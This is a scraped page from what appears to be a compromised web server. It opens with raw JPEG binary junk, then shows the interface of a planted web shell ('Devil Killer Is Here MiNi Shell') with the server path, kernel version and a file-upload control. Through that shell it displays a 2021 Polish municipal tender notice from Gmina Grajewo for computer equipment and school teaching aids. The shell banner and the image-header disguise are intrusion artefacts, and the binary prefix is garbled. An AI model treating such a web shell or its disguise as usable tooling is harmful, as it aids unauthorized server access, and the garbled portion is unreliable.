JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210722/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210722/0012305701-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00123057 z dnia 2021-07-22</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa sprzętu komputerowego i pomocy dydaktycznych do obiektów gminnych. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA GRAJEWO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 450669720</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Komunalna 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Grajewo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">19-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL843 - Suwalski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">86 273 01 49</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@uggrajewo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.ug.grajewo.wrotapodlasia.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa sprzętu komputerowego i pomocy dydaktycznych do obiektów gminnych. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1c0b21b3-eaaf-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00123057</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Europejski Fundusz Społeczny </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://uggrajewo.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://uggrajewo.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja pomiędzy Zamawiającym a Wykonawcami, w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji (innych niż oferta Wykonawcy), odbywa się przy użyciu środków komunikacji elektronicznej, tj. Platformy Przetargowej pod adresem:<br/>https://uggrajewo.logintrade.net/rejestracja/ustawowe.html<br/>Do połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy protokołu SSL. Certyfikat SSL zapewnia poufność transmisji danych przesyłanych przez Internet. Wykonawca posiadający konto na Platformie Przetargowej Gminy Grajewo ma dostęp do możliwości złożenia, zmiany, wycofania oferty, a także funkcjonalności pozwalających na zadawanie pytań do treści SWZ oraz komunikację z Zamawiającym w pozostałych obszarach.<br/>Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. 2020 poz.2452).<br/>Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy użyciu Platformy Przetargowej dostępne są pod adresem:<br/> https://uggrajewo.logintrade.net/rejestracja/ustawowe.html<br/><br/>Korzystanie z Platformy przez Wykonawcę jest bezpłatne.<br/>Informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej:<br/>1) Środkiem komunikacji elektronicznej, służącym złożeniu oferty przez Wykonawcę, jest prawidłowe złożenie na Platformie dostępnej pod adresem<br/> https://uggrajewo.logintrade.net/rejestracja/ustawowe.html <br/>w wierszu oznaczonym tytułem oraz znakiem sprawy zgodnym z niniejszym postępowaniem.<br/>Instrukcja złożenia oferty środkiem komunikacji elektronicznej w niniejszym postępowaniu dostępna jest na stronie: <br/> https://uggrajewo.logintrade.net/rejestracja/ustawowe.html<br/> w zakładce ,INSTRUKCJE’’ plik Udział w trybie podstawowym bez negocjacji.<br/> Wymagania sprzętowo- aplikacyjne umożliwiające pracę na platformie:<br/>a) dopuszczalne przeglądarki internetowe:<br/>	Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer11,<br/>	Google Chrome 31<br/>	Mozilla Firefox 26<br/>	Opera 18<br/>b) pozostałe wymagania techniczne:<br/>	dostęp do sieci internet;<br/>	obsługa przez przeglądarkę protokołu XMLHttpRequest – ajax;<br/>	włączona obsługa JavaScript;<br/>	zalecana szybkość łącza internetowego powyżej 500 KB/s;<br/>	zainstalowany Acrobat Reader;<br/>	zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 <br/> Update 24 lub nowszy.<br/>W razie jakichkolwiek problemów należy korzystać ze wsparcia technicznego dla Wykonawców: Helpdesk Logintrade +48 71 787 35 34, helpdesk@logintrade.net dostępnego poniedziałek- piątek godz. 8:00-16:00<br/>Ofertę, oświadczenia, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w formie elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, odt. opatrzone podpisem kwalifikowanym lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula RODO została zawarta w rozdziale XLI SWZ></span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">INZP.7011.14.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 178221,85 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zestaw projekcyjny do „kina pod chmurką”. Nazwa projektu: „Kreatywne spotkania w Wojewodzinie” realizowany przez Gminę Grajewo współfinansowany z budżetu Województwa Podlaskiego w ramach „Programu odnowy wsi województwa podlaskiego – Kreatywna wieś” <br/>Projektor /6000 lumen, WUXGA, 1920x1200, 16:10, Full HD, kontrast 2500000:1, przyłącze USB, żywotność źródła światła 20 000 godz./ – szt. 1<br/>Ekran projekcyjny / Ekran ramowy przenośny, wymiary min. 500 cm x 300 cm, format - 16:10/ - szt. 1 <br/>Zestaw nagłaśniający /moc 200 W RMS subwoofera i 140 W RMS kolumn, przenośny, pokrycie poziome 120°, czułość (1 W / 1 m): 96 dB/ – szt. 2<br/>Laptop / AMD Ryzen, dysk SSD 512 GB, fullHD 1920x1080, 15,6”, RAM 8GB, AMD Radeon, Win10/ – szt. 1<br/>Przedłużacz /bębnowy, długość 40 m., 5 wejść, 3 żyłowy / – szt. 1<br/>Adres dostawy: świetlica wiejska w Wojewodzinie. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 24347,97 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30236000-2 - Różny sprzęt komputerowy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">15 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)cena ofertowa brutto – kryterium 60% / waga - 60pkt<br/>2)Okres gwarancji i rękojmi – kryterium 10% / waga – 10pkt<br/>3)Termin realizacji – kryterium 30% / waga – 30pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakup pomocy dydaktycznych i sprzętu komputerowego do szkół. Nazwa zadania: „Wiedza kluczem do rozwoju”. Zadanie współfinansowane przez Unię Europejską ze środków Europejskiego Funduszu Społecznego. Nazwa programu: Regionalny Program Operacyjny Województwa Podlaskiego na lata 2014-2020. <br/>Obejmuje dostawę:<br/>Pomoce dydaktyczne do prowadzenia zajęć:<br/>Koło języka angielskiego: /-didakta- język angielski 2 dla zaawansowanych, Euro Plus + Angielski z Cambrige Extra Edition, Konwersacje angielski i niemiecki program na tablicę interaktywną/ - po 1szt. <br/>Zajęcia dydaktyczno-wyrównawcze z języka angielskiego /Didakta język angielski 1 dla początkujących, stacje czytania ze zrozumieniem 2 szt, Stacje pisania 2 szt., Alfabet angielski program na tablicę interaktywną The English Alphabet Stietel, Class clock nauka czasu zegarowego i daty- jezyk angielski / <br/>Zajęcia rozwijające z matematyki / Rozumiem obliczenia procentowe- aktywny zestaw demonstracyjny, Krzyż geometryczny- demonstracyjny, Kanto- zestaw konstrukcyjny demonstracyjny 2 szt./<br/>Zajęcia dydaktyczno-wyrównawcze z matematyki / Budujemy szkielety brył 2 szt, Cyrkiel na tablice- na przyssawkach, Koło do odmierzania odległości z licznikiem zielone, Miara wzrostu, <br/>Komplet 8 wag sprężynowych z siłomierzem, Akademia umysłu pamięć, Liczydło szkone jezdne/ <br/>Logopedia klasy IV-VIII /……./ – szt. 1<br/>Wyposażenie w sprzęt komputerowy:<br/>Monitor interaktywny /Rozmiar ekranu<br/>55", ze wsparciem min. 32 punktów dotyku, rozdzielczość 4K Ultra HD 3840 x 2160/ 1 szt.<br/>Komputer wraz z oprogramowaniem / Desktop procesor 6 rdzeniowy, pamięć RAM 8 GB, dysk SSD 256 GB, karta sieciowa, dźwiękowa, nagrywarka DVD, Display Port.Monitor FullHD 21,5 cala; matryca matowa, Display Port; klawiatura, mysz, Windows 10 Pro + Ms Office 2019 dla szkół/ – 8 szt.<br/>Laptop / AMD Ryzen, dysk SSD 512 GB, fullHD 1920x1080, 15,6”, RAM 8GB, AMD Radeon, Win10/ – szt. 1<br/>Oprogramowanie /programy edukacyjne (DIDAKTA Matematyka 1 i 2, wersja polska, wielostanowiskowy, licencja edukacyjna wieczysta)1 szt.<br/><br/>Adres dostawy: Szkoła Podstawowa w Wierzbowie, Wierzbowo 72<br/><br/>Pomoce dydaktyczne do prowadzenia zajęć:<br/>Koło zainteresowań językiem angielskim / Angielskie gry słowne - poziom 1, 2 szt, Aktywne czytanie po angielsku - poziom 2 1 szt/<br/>Zajęcia rozwijające z matematyki - /zestaw klocków do budowy brył Polydron Frame lub równoważne/ - szt. 1 <br/>Koło komputerowe (programowanie) / Ćwiczenia z kodowania -2szt, Naucz się kodować - seria 3 -1szt., Naucz się kodować - seria 2 -1szt./ <br/>Koło szchowe / Szachy drewniane we wkładce10 szt., Zegar szachowy elektroniczny 10 sztuk/<br/>Zajęcia dydaktyczno-wyrównawcze z fizyki /Cyfrowy miernik uniwersalny 1 szt.,Dystansomierz 1szt. / <br/>Koło przyrodnicze/ Botanika zestaw 13 plansz - 1 zestaw, Anatomia człowieka zestaw plansz 1 zestaw, Model człowieka 1 szt, Planeta ziemia BBC box 12 płyt dvd 1 szt., Drzewa iglaste 1szt., Drzewa liściaste 1 szt., Mikroskop biol MD1322 z ośw. 3 szt., Komórki i tkanki –plansza 1szt., Planeta dinozaurów – plansza 1szt., Systematyka roślin 1 szt., Systematyka zwierząt	1 szt, Życie ssaków BBC – film 1 szt., Witaminy w organizmie człowieka- plansza 1 szt., Budowa i replikacja DNA 1 szt., Aparat fotograficzny cufrowy z 50-krotnym zoomem optycznym 1szt./ <br/>Logopedia klasy IV-VIII / ….. / – szt. 1<br/>Adres dostawy: Szkoła Podstawowa w Danówku, Danówek 7<br/><br/>Pomoce dydaktyczne do prowadzenia zajęć:<br/>Zajęcia dydaktyczno-wyrównawcze z matematyki /Rozumiem mnożenie i dzielenie liczb dwucyfrowych 1szt., Ułamkowy wyścig – gra 1szt., Gra Logix-mini Alexander 4 szt., Plus i minus - gra arytmetyczna 3 szt., Oś liczbowa od 50 do 50 demonstracyjna 1 szt., Eduline 6 - komplet przyborów geometrycznych z tablicą magnetyczną 1 szt./<br/>Zajęcia dydaktyczno-wyrównawcze z fizyki /Cyfrowy miernik uniwersalny 1 szt.,Dystansomierz 1szt. / <br/>Zajęcia dydaktyczno-wyrównawcze z geogeafii / Niezwykły świat BBC pakiet 12 płyt 1szt., Globus fizyczny 16 cm-10 szt., Polska w Europie i świecie 3 w 1 (mapa ścienna)	1szt., Świat fizyczny i polityczny- mapa dwustronna 1szt., Kompas busola 1szt., Mapa pogody1szt.,Minerały i kamienie szlachetne – plansza 1szt., Afryka - Niezwykły Świat - film1szt., Australia -Niezwykły Świat - film 1szt., Chiny - Niezwykły świat – film 1szt., Europa- Niezwykły Świat – film 1szt./<br/>Koło komputerowe /Złapmy lwa – Zestaw 1 szt., Zestaw: Scottie Go! + Tablet Acer Iconia One 7 - 2 szt., LEGO WEDO 2.0 - ZESTAW BAZOWY Z OPROGRAMOWANIEM-5szt./<br/>Koło przyrodnicze / Botanika zestaw 13 plansz - 1zestaw, Anatomia człowieka zestaw plansz 1 zestaw, Model człowieka 1 szt, Planeta ziemia BBC box 12 płyt dvd 1 szt., Drzewa iglaste 1szt., Drzewa liściaste 1 szt., Mikroskop biol MD1322 z ośw. 3 szt., Komórki i tkanki –plansza 1szt., Planeta dinozaurów – plansza 1szt., Systematyka roślin 1 szt., Systematyka zwierząt	1 szt, Życie ssaków BBC – film 1 szt., Witaminy w organizmie człowieka- plansza 1 szt., Budowa i replikacja DNA 1 szt., Aparat fotograficzny cufrowy z 50-krotnym zoomem optycznym 1szt./<br/>Koło literackie / Kombinatoryka wyrazowa 1szt., Kombinatoryka wyrazowa 1szt., Gra w słówka 1szt., Rozwijanie podstawowych form wypowiedzi ustnych i pisemnych ucznia szkoły podstawowej 1szt., Tropy stylistyczne 1szt., Rodzaje i gatunki literackie 1szt., Statki ortograficzne 10szt., Wyścig ortograficzny 1szt., Nowe dyktanda-szkoła podstawowa kl.4-6 - 1szt.<br/>Koło młodych fizyków /Pakiet fizyka starter/ 1szt.<br/>Koło szchowe / Szachy drewniane we wkładce	10 szt., Zegar szachowy elektroniczny	10 sztuk/<br/>Młody chemik /szafa do pracowni chemicznej wys. 1850 szer. 900 gł. 400 – 1szt., Modele atomów kulkowe zestaw duży 6 szt./<br/>Pomoce dydaktyczne do prowadzenia zajęć:<br/>Zajęcia dydaktyczno-wyrównawcze z matematyki /Rozumiem mnożenie i dzielenie liczb dwucyfrowych 1szt., Ułamkowy wyścig – gra 1szt., Gra Logix-mini Alexander 4 szt., Plus i minus - gra arytmetyczna 3 szt., Oś liczbowa od 50 do 50 demonstracyjna 1 szt., Eduline 6 - komplet przyborów geometrycznych z tablicą magnetyczną 1 szt./<br/>Zajęcia dydaktyczno-wyrównawcze z fizyki /Cyfrowy miernik uniwersalny 1 szt.,Dystansomierz 1szt. / <br/>Zajęcia dydaktyczno-wyrównawcze z geogeafii / Niezwykły świat BBC pakiet 12 płyt 1szt., Globus fizyczny 16 cm	10 szt., Polska w Europie i świecie 3 w 1 (mapa ścienna)	1szt., Świat fizyczny i polityczny- mapa dwustronna 1szt., Kompas busola 1szt., Mapa pogody	1szt.,Minerały i kamienie szlachetne – plansza 1szt., Afryka - Niezwykły Świat - film	1szt., Australia -Niezwykły Świat - film 1szt., Chiny - Niezwykły świat – film 1szt., Europa- Niezwykły Świat – film 1szt./<br/>Koło komputerowe /Złapmy lwa – Zestaw 1 szt., Zestaw: Scottie Go! + Tablet Acer Iconia One 7 - 2 szt., LEGO WEDO 2.0 - ZESTAW BAZOWY Z OPROGRAMOWANIEM	5szt./<br/>Koło przyrodnicze / Botanika zestaw 13 plansz - 1zestaw, Anatomia człowieka zestaw plansz 1 zestaw, Model człowieka 1 szt, Planeta ziemia BBC box 12 płyt dvd 1 szt., Drzewa iglaste 1szt., Drzewa liściaste 1 szt., Mikroskop biol MD1322 z ośw. 3 szt., Komórki i tkanki –plansza 1szt., Planeta dinozaurów – plansza 1szt., Systematyka roślin 1 szt., Systematyka zwierząt	1 szt, Życie ssaków BBC – film 1 szt., Witaminy w organizmie człowieka- plansza 1 szt., Budowa i replikacja DNA 1 szt., Aparat fotograficzny cufrowy z 50-krotnym zoomem optycznym 1szt./<br/>Koło literackie / Kombinatoryka wyrazowa 1szt., Kombinatoryka wyrazowa 1szt., Gra w słówka 1szt., Rozwijanie podstawowych form wypowiedzi ustnych i pisemnych ucznia szkoły podstawowej 1szt., Tropy stylistyczne 1szt., Rodzaje i gatunki literackie 1szt., Statki ortograficzne 10szt., Wyścig ortograficzny 1szt., Nowe dyktanda-szkoła podstawowa kl.4-6 - 1szt.<br/>Koło młodych fizyków /Pakiet fizyka starter/ 1szt.<br/>Koło szchowe / Szachy drewniane we wkładce	10 szt., Zegar szachowy elektroniczny	10 sztuk/<br/>Młody chemik /szafa do pracowni chemicznej wys. 1850 szer. 900 gł. 400 – 1szt., Modele atomów kulkowe zestaw duży 6 szt./<br/>Zajęcia dydaktyczno-wyrównawcze z chemii / Komplet szczotek do czyszczenia szkła 1szt., Paski wskaźnikowe ph 1-14 (100 szt.) 1kpl.,<br/>Bibułka labolatoryja 100 szt. 1kpl.,Szczypce do probówek 1szt., Rozdzielacz gruszkowy 1szt., Pipeta szklana 5szt., Lejek szklany 2szt., Lejek szklany 2szt., Moździerz porcelanowy 1szt., Szpatułko - łyżeczka porcelanowa 2szt., Statyw metalowy z 4 elementami 1szt.,<br/>Palnik alkoholowy szklany 2szt.,	<br/>Pęseta 115 mm- stal nierdzewna 3szt., Łapa do probówek drewniana 2szt., Łyżecza do spalań 1szt.,<br/>Opiłki żelaza 1szt., Wstążka magnezowa 1szt., Atomy i cząsteczki 6szt., Kwasy i zasady 6szt., Sole 6szt., Węglowodory i pochodne 6szt., Pałeczki metalowe - przewodnik 1szt./<br/>Zajęcia dydaktyczno-wyrównawcze z języka angielskiego / Mapa - The British Isles Physical 1szt., Mapa - North America Physical 1szt., Mapa - Australia Physical 1szt./ <br/>Zajęcia rozwijające z matematyki / Bingo ułamkowe 